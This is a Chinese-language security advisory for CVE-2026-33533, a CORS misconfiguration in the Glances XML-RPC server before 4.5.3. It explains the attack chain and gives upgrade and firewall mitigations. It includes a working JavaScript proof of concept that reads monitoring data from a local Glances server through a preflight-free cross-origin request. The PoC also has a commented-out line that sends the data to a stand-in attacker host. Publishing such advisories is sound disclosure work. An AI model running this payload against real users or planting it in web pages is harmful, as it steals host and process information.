CVE-2026-33533 CVSS 6.5 中危

CVE-2026-33533 Glances信息泄露漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33533

漏洞类型

CORS配置错误

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Glances

漏洞概述

Glances是一款开源跨平台监控工具。在4.5.3版本之前，其XML-RPC服务器存在CORS配置错误漏洞。由于服务器在HTTP响应中发送通配符CORS头且未验证Content-Type，攻击者可诱导受害者访问恶意网页。通过构造CORS“简单请求”，攻击者可绕过预检机制，发送XML-RPC负载并获取服务器返回的完整系统监控数据，导致敏感信息泄露。

技术细节

该漏洞核心在于Glances XML-RPC服务器对CORS策略的宽松配置和Content-Type验证缺失。攻击者利用浏览器对Content-Type为text/plain的POST请求视为“简单请求”的特性，无需发送OPTIONS预检请求即可发起跨域调用。攻击者构造包含XML-RPC方法调用（如获取系统状态或进程列表）的恶意网页，诱导受害者访问。当受害者执行脚本时，浏览器向本地Glances服务发送请求。服务器因未校验Content-Type而错误处理了XML负载，并返回包含主机名、IP、进程命令行等敏感信息的监控数据。由于响应头包含Access-Control-Allow-Origin: *，攻击者脚本成功读取并外泄这些数据。

攻击链分析

STEP 1

诱导访问

攻击者诱导受害者访问包含恶意JavaScript代码的网页。

STEP 2

发起请求

受害者浏览器执行脚本，向本地运行的Glances XML-RPC服务端口发送Content-Type为text/plain的POST请求（CORS简单请求），携带XML-RPC负载。

STEP 3

数据处理

Glances服务器接收请求，因未校验Content-Type而解析XML体，并返回包含敏感系统信息的完整数据集。

STEP 4

数据窃取

浏览器接收到服务器响应，由于响应头包含Access-Control-Allow-Origin: *，攻击者的JavaScript成功读取响应内容并将数据发送至攻击者服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-33533 -->
<!-- Exploiting CORS misconfiguration in Glances XML-RPC -->
<script>
  function exfiltrateData() {
    // Target the local Glances XML-RPC server (default port 61209)
    const target = 'http://127.0.0.1:61209';
    
    // XML-RPC payload to list methods or retrieve system info
    const xmlPayload = `<?xml version='1.0'?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>`;

    // Send a CORS simple request (POST with text/plain)
    fetch(target, {
      method: 'POST',
      headers: {
        'Content-Type': 'text/plain' // Bypasses preflight check
      },
      body: xmlPayload
    })
    .then(response => response.text())
    .then(data => {
      console.log('Leaked Data:', data);
      // Data can be exfiltrated to an attacker-controlled server
      // fetch('https://attacker.com/collect', { method: 'POST', body: data });
    })
    .catch(err => console.error('Exploit failed:', err));
  }
  exfiltrateData();
</script>

影响范围

Glances < 4.5.3

防御指南

临时缓解措施

建议用户尽快将Glances更新至4.5.3版本。若暂时无法升级，应停止在公网或不可信网络环境暴露XML-RPC端口，或通过防火墙规则严格限制访问来源，防止恶意网页利用浏览器进行跨域数据窃取。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表